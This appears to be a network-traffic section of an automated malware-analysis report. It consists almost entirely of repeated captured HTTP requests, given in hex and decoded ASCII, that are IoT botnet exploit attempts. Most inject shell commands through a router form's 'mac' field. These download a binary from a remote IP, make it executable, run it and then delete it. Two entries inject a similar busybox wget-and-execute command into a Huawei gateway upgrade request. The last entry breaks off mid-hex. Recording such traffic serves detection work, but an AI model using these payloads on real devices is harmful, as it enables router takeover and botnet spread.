                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 